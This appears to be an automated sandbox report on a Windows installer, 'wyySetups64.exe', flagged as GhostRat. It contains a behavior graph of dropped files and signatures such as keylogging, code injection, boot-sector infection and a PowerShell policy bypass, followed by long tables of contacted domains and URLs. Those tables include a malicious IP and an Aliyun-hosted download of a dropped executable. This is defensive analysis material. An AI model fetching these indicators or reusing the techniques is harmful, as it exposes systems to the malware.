    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581895 Sample: wyySetups64.exe Startdate: 29/12/2024 Architecture: WINDOWS Score: 100 52 tr.p.360.cn 2->52 54 st.p.360.cn 2->54 56 8 other IPs or domains 2->56 70 Suricata IDS alerts for network traffic 2->70 72 Yara detected GhostRat 2->72 74 Connects to many ports of the same IP (likely port scanning) 2->74 76 AI detected suspicious sample 2->76 9 wyySetups64.exe 17 2->9         started        14 360instpatch.exe 21 56 2->14         started        16 svchost.exe 2->16         started        18 360instpatch.exe 2->18         started        signatures3 process4 dnsIp5 58 118.107.44.219, 18852, 19091, 19092 BCPL-SGBGPNETGlobalASNSG Singapore 9->58 60 gwwifha84989.oss-ap-northeast-2.aliyuncs.com 149.129.12.34, 443, 49735 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 9->60 40 C:\Users\user\Downloads\360instpatch.exe, PE32 9->40 dropped 42 C:\Users\user\AppData\...\wyySetups64.exe, PE32 9->42 dropped 44 C:\Users\user\AppData\...\360instpatch[1].exe, PE32 9->44 dropped 46 C:\Users\...\wyySetups64.exe:Zone.Identifier, ASCII 9->46 dropped 88 Detected unpacking (overwrites its own PE header) 9->88 20 wyySetups64.exe 3 2 9->20         started        62 39.156.85.200, 49748, 80 CMNET-GDGuangdongMobileCommunicationCoLtdCN China 14->62 64 39.156.85.201, 49749, 49751, 49752 CMNET-GDGuangdongMobileCommunicationCoLtdCN China 14->64 68 9 other IPs or domains 14->68 48 C:\Users\user\AppData\Local\...\360P2SP.dll, PE32 14->48 dropped 50 C:\Users\user\AppData\Local\...\sites.dll, PE32 14->50 dropped 90 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 14->90 92 Contains functionality to infect the boot sector 14->92 94 Checks if browser processes are running 14->94 96 3 other signatures 14->96 66 127.0.0.1 unknown unknown 16->66 file6 signatures7 process8 file9 38 C:\Users\user\AppData\Local\updated.ps1, ASCII 20->38 dropped 78 Protects its processes via BreakOnTermination flag 20->78 80 Contains functionality to inject threads in other processes 20->80 82 Contains functionality to capture and log keystrokes 20->82 84 Contains functionality to inject code into remote processes 20->84 24 cmd.exe 1 20->24         started        27 cmd.exe 1 20->27         started        signatures10 process11 signatures12 86 Bypasses PowerShell execution policy 24->86 29 powershell.exe 1 23 24->29         started        32 conhost.exe 24->32         started        34 powershell.exe 5 27->34         started        36 conhost.exe 27->36         started        process13 signatures14 98 Loading BitLocker PowerShell Module 29->98

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    wyySetups64.exe0%ReversingLabs
    wyySetups64.exe6%VirustotalBrowse

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\360instpatch[1].exe17%ReversingLabs
    C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\sites.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\{DFE14265-3905-4689-9143-1E1473933304}.tmp\360P2SP.dll4%ReversingLabs
    C:\Users\user\AppData\Roaming\wyySetups64.exe0%ReversingLabs
    C:\Users\user\Downloads\360instpatch.exe17%ReversingLabs

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://%s/%s.trt0%Avira URL Cloudsafe
    http://sfdw.360safe.com/superkiller/superkillerexe_880765522ded7527821ce7448af08018_5.1.64.1181.cab0%Avira URL Cloudsafe
    http://pinst.360.cn/zhuomian/desktopsafe.cab0%Avira URL Cloudsafe
    https://gwwifha84989.oss-ap-northeast-2.aliyuncs.com/360instpatch.exez0%Avira URL Cloudsafe
    https://gwwifha84989.oss-ap-northeast-2.aliyuncs.com/360instpatch.exen0%Avira URL Cloudsafe
    https://gwwifha84989.oss-ap-northeast-2.aliyuncs.com/34-10020%Avira URL Cloudsafe
    http://pinst.360.cn/360safe/h_inst.cab?rd=366083369C0-6B1983C613820%Avira URL Cloudsafe
    http://go.microsoftMicrosoft.PowerShell.ODataAdapter.ps10%Avira URL Cloudsafe
    http://go.microsoftM0%Avira URL Cloudsafe
    http://wpad.%s/wpad.dat0%Avira URL Cloudsafe
    http://%s/wpad.dat0%Avira URL Cloudsafe
    http://%s/gf/360ini.cabhttp://dl.360safe.com/gf/360ini.cab0%Avira URL Cloudsafe
    http://home.arcor.de/starwalker22/Test/UrlExtractDemo.cab0%Avira URL Cloudsafe
    http://pinst.360.cn/360safe/h_inst.cab?rd=36608336st.c0%Avira URL Cloudsafe
    https://bbs.360.cn/thread-16079507-1-1.html0%Avira URL Cloudsafe
    http://wpad.%s/wpad.dathttp://%s/wpad.datwpad0%Avira URL Cloudsafe
    http://sfdw.360safe.com/setup.exe.exe0%Avira URL Cloudsafe
    http://%s/gf/360ini.cab0%Avira URL Cloudsafe
    http://pinst.360.cn/360safe/h_inst.cab?rd=36608336//VJ80%Avira URL Cloudsafe
    https://gwwifha84989.oss-ap-northeast-2.aliyuncs.com/360instpatch.exe0/0%Avira URL Cloudsafe
    https://gwwifha84989.oss-ap-northeast-2.aliyuncs.com/360instpatch.exe0%Avira URL Cloudsafe
    http://pinst.360.cn/360safe/h_inst.cab0%Avira URL Cloudsafe
    http://sfdw.360safe.com/safesetup_2000.exe3600%Avira URL Cloudsafe
    http://agd.p.360.cn36pData0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    tr.p.360.cn
    		1.192.136.132
    		truefalse
      		high
      agt.p.360.cn
      		1.192.136.132
      		truefalse
        		high
        agd2.p.360.cn
        		1.192.194.232
        		truefalse
          		high
          gwwifha84989.oss-ap-northeast-2.aliyuncs.com
          		149.129.12.34
          		truefalse
            		unknown
            s.360.cn
            		180.163.251.230
            		truefalse
              		high
              seupdate.360qhcdn.com
              		39.156.85.231
              		truefalse
                		high
                st.p.360.cn
                		1.192.136.170
                		truefalse
                  		high
                  agd.p.360.cn
                  		unknown
                  		unknownfalse
                    		high
                    pinst.360.cn
                    		unknown
                    		unknownfalse
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://s.360.cn/safe/instcomp.htm?soft=1000&status=109&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid=false
                        		high
                        http://s.360.cn/safe/instcomp.htm?soft=1000&status=129&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid=false
                          		high
                          http://s.360.cn/safe/instcomp.htm?soft=1000&status=12&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid=false
                            		high
                            http://s.360.cn/safe/instcomp.htm?soft=1000&status=127&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&parent=Non-existent%20Process&ver=13.0.0.1231&pid=false
                              		high
                              http://s.360.cn/safe/instcomp.htm?soft=425&status=19&mid=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=4187&downrate=0&downlen=0false
                                		high
                                http://s.360.cn/safe/instcomp.htm?soft=1000&status=100&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid=false
                                  		high
                                  http://s.360.cn/safe/instcomp.htm?soft=1000&status=1&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid=false
                                    		high
                                    http://s.360.cn/safe/instcomp.htm?soft=1000&status=10&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid=false
                                      		high
                                      http://s.360.cn/safe/instcomp.htm?soft=425&status=1&mid=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=0&downrate=0&downlen=0false
                                        		high
                                        https://gwwifha84989.oss-ap-northeast-2.aliyuncs.com/360instpatch.exefalse
                                        • Avira URL Cloud: safe
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://down.360safe.com/setup.exehttp://down.360safe.com/setupbeta.exe360instpatch.exe, 00000008.00000002.4120321049.000000006CE29000.00000004.00000001.01000000.0000000D.sdmp, 360instpatch.exe, 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000000.1789703618.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000000.1798326066.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799520437.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799550491.0000000000BF8000.00000004.00000001.01000000.0000000A.sdmp, sites.dll.8.dr, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drfalse
                                          		high
                                          http://s.360.cn/safe/instcomp.htm?soft=1000&status=129&m=6039146e22b008fbd61fc0617475e9aa&from=safef360instpatch.exe, 00000008.00000002.4115869359.0000000001609000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0wyySetups64.exe, wyySetups64.exe.0.drfalse
                                              		high
                                              http://pinst.360.cn/zhuomian/desktopsafe.cab360instpatch.exe, 00000008.00000000.1789664825.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.microsoft.copowershell.exe, 00000006.00000002.1780265823.0000000007AD6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10360instpatch.exefalse
                                                  		high
                                                  https://g.live.com/odclientsettings/ProdV2.C:edb.log.12.drfalse
                                                    		high
                                                    http://www.fontbureau.com/designers360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.sajatypeworks.com360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://g.live.com/odclientsettings/Prod.C:edb.log.12.drfalse
                                                          		high
                                                          http://www.founder.com.cn/cn/cThe360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://hao.360.cn/?installer360instpatch.exefalse
                                                              		high
                                                              https://gwwifha84989.oss-ap-northeast-2.aliyuncs.com/360instpatch.exenwyySetups64.exe, 00000000.00000002.1809349190.0000000000198000.00000004.00000010.00020000.00000000.sdmp, wyySetups64.exe, 00000000.00000002.1809394272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, wyySetups64.exe, 00000001.00000002.4114622663.000000000019B000.00000004.00000010.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://hao.360.cn360instpatch.exefalse
                                                                		high
                                                                https://www.remobjects.com/pswyySetups64.exe, wyySetups64.exe.0.drfalse
                                                                  		high
                                                                  https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.1778471826.0000000006598000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.innosetup.com/wyySetups64.exe, wyySetups64.exe.0.drfalse
                                                                      		high
                                                                      http://www.galapagosdesign.com/DPlease360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://%s/%s.trt360instpatch.exe, 360instpatch.exe, 00000008.00000003.1797435191.0000000004191000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp, 360P2SP.dll.8.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://gwwifha84989.oss-ap-northeast-2.aliyuncs.com/360instpatch.exezwyySetups64.exe, 00000000.00000002.1810189166.00000000007B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://s.360.cn/safe/instcomp.htm?soft=1000&status=109&m=6039146e22b008fbd61fc0617475e9aa&from=safef360instpatch.exe, 00000008.00000003.1844261692.0000000003222000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://go.microsoftMpowershell.exe, 00000006.00000002.1779756708.0000000007A03000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.urwpp.deDPlease360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.zhongyicts.com.cn360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://wpad.%s/wpad.dat360instpatch.exefalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.1774677766.0000000005531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1765795867.0000000004838000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://sfdw.360safe.com/superkiller/superkillerexe_880765522ded7527821ce7448af08018_5.1.64.1181.cab360instpatch.exefalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 0000000C.00000003.1825614884.000001A6AFB32000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.12.dr, edb.log.12.drfalse
                                                                                  		high
                                                                                  http://pinst.360.cn/360safe/h_inst.cab?rd=366083369C0-6B1983C61382360instpatch.exe, 00000008.00000002.4115869359.00000000015AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://s.360.cn/safe/instcomp.htm?soft=425&status=1&mid=6039146e22b008fbd61fc0617475e9aa&from=safefi360instpatch.exe, 00000008.00000002.4116675905.0000000003206000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4116675905.00000000031CA000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1844261692.000000000321E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://gwwifha84989.oss-ap-northeast-2.aliyuncs.com/34-1002wyySetups64.exe, 00000000.00000002.1810189166.00000000007B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://go.microsoftMicrosoft.PowerShell.ODataAdapter.ps1powershell.exe, 00000006.00000002.1779756708.0000000007A03000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://down.360safe.com/setupbeta.exe360instpatch.exefalse
                                                                                      		high
                                                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.1774677766.0000000005685000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://schemas.xmlsoap.org/soap/encoding/360P2SP.dll.8.drfalse
                                                                                          		high
                                                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.1774677766.0000000005685000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1780192151.0000000007A74000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://%s/wpad.dat360instpatch.exefalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://go.micropowershell.exe, 00000006.00000002.1774677766.0000000005B9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1774677766.0000000005E88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://hao.360.com360instpatch.exe, 00000008.00000000.1789664825.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drfalse
                                                                                                		high
                                                                                                https://contoso.com/Iconpowershell.exe, 00000006.00000002.1778471826.0000000006598000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://s.360.cn/safe/instcomp.htm?soft=425&status=19&mid=6039146e22b008fbd61fc0617475e9aa&from=safef360instpatch.exe, 00000008.00000002.4116675905.0000000003206000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://crl.ver)svchost.exe, 0000000C.00000002.3462329786.000001A6AFC10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://home.arcor.de/starwalker22/Test/UrlExtractDemo.cab360instpatch.exe, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10&installed=%d360instpatch.exefalse
                                                                                                        		high
                                                                                                        http://www.symauth.com/cps0(360instpatch.exe, 00000008.00000003.1797435191.0000000004239000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797588551.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.8.dr, sites.dll.8.drfalse
                                                                                                          		high
                                                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.1774677766.0000000005685000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://s.360.cn/safe/instcomp.htm?soft=1000&status=100&m=6039146e22b008fbd61fc0617475e9aa&from=safef360instpatch.exe, 00000008.00000002.4116675905.00000000031DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://%s/gf/360ini.cab360instpatch.exefalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://down.360safe.com/setup.exePathSOFTWARE360instpatch.exe, 00000008.00000000.1789664825.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4120288463.000000006CE05000.00000002.00000001.01000000.0000000D.sdmp, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, sites.dll.8.dr, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drfalse
                                                                                                                		high
                                                                                                                http://wpad.%s/wpad.dathttp://%s/wpad.datwpad360instpatch.exe, 00000008.00000003.1797435191.0000000004191000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp, 360P2SP.dll.8.drfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.carterandcone.coml360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://pinst.360.cn/360safe/h_inst.cab?rd=36608336st.c360instpatch.exe, 00000008.00000002.4118556728.00000000046D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://hao.360.cn/?installerhttps://hao.360.cnhttps://http://https://hao.360.cn/%s360instpatch.exe, 00000008.00000000.1789664825.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drfalse
                                                                                                                    		high
                                                                                                                    http://www.fontbureau.com/designers/frere-user.html360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://bbs.360.cn/thread-16079507-1-1.html360instpatch.exefalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://hao.360.cn/360instpatch.exefalse
                                                                                                                        		high
                                                                                                                        http://www.symauth.com/rpa00360instpatch.exe, 00000008.00000003.1797435191.0000000004239000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797588551.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.8.dr, sites.dll.8.drfalse
                                                                                                                          		high
                                                                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000006.00000002.1774677766.0000000005685000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1774677766.0000000005960000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://down.360safe.com/h11=360instpatch.exe, 00000008.00000003.1797435191.0000000004191000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp, 360P2SP.dll.8.drfalse
                                                                                                                              		high
                                                                                                                              http://123.com/wdurlprocsi:19510029safeinstallsafeinstall.infoseinstallseinstall.infopop:360instpatch.exe, 00000008.00000000.1789664825.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drfalse
                                                                                                                                		high
                                                                                                                                http://s.360.cn/safe/instcomp.htm?soft=1000&status=1&m=6039146e22b008fbd61fc0617475e9aa&from=safefin360instpatch.exe, 00000008.00000002.4115869359.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1844261692.000000000320E000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4116675905.0000000003206000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1836204024.0000000003018000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://www.360.cn360instpatch.exe, 00000008.00000003.1797435191.0000000004239000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797588551.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.8.dr, sites.dll.8.drfalse
                                                                                                                                    		high
                                                                                                                                    http://123.com/360instpatch.exe, 00000008.00000000.1789664825.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drfalse
                                                                                                                                      		high
                                                                                                                                      http://%s/gf/360ini.cabhttp://dl.360safe.com/gf/360ini.cab360instpatch.exe, 00000008.00000000.1789664825.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      http://down.360safe.com/setup.exe360instpatch.exefalse
                                                                                                                                        		high
                                                                                                                                        http://pinst.360.cn/360safe/h_inst.cab?rd=36608336//VJ8360instpatch.exe, 00000008.00000002.4118275547.0000000004286000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        http://s.360.cn/safe/instcomp.htm?soft=1000&status=10&m=6039146e22b008fbd61fc0617475e9aa&from=safefi360instpatch.exe, 00000008.00000002.4116675905.0000000003206000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4115869359.0000000001609000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://www.fontbureau.com/designersG360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10&http://s.360.cn/safe/instcomp360instpatch.exe, 00000008.00000000.1789664825.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drfalse
                                                                                                                                              		high
                                                                                                                                              http://www.fontbureau.com/designers/?360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://www.founder.com.cn/cn/bThe360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://ocsp.sectigo.com0wyySetups64.exe, wyySetups64.exe.0.drfalse
                                                                                                                                                    		high
                                                                                                                                                    http://sfdw.360safe.com/setup.exe.exe360instpatch.exe, 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799585748.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		unknown
                                                                                                                                                    http://www.fontbureau.com/designers?360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://contoso.com/Licensepowershell.exe, 00000006.00000002.1778471826.0000000006598000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://s.360.cn/safe/instcomp.htm?soft=1000&status=8&m=6039146e22b008fbd61fc0617475e9aa&from=safefin360instpatch.exe, 00000008.00000002.4116675905.0000000003206000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4115869359.0000000001609000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://schemas.xmlsoap.org/soap/envelope/360instpatch.exe, 360instpatch.exe, 00000008.00000003.1797435191.0000000004191000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp, 360P2SP.dll.8.drfalse
                                                                                                                                                            		high
                                                                                                                                                            http://www.360.cn/360instpatch.exe, 360instpatch.exe, 00000008.00000003.1797435191.0000000004191000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp, 360P2SP.dll.8.drfalse
                                                                                                                                                              		high
                                                                                                                                                              http://www.tiro.com360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
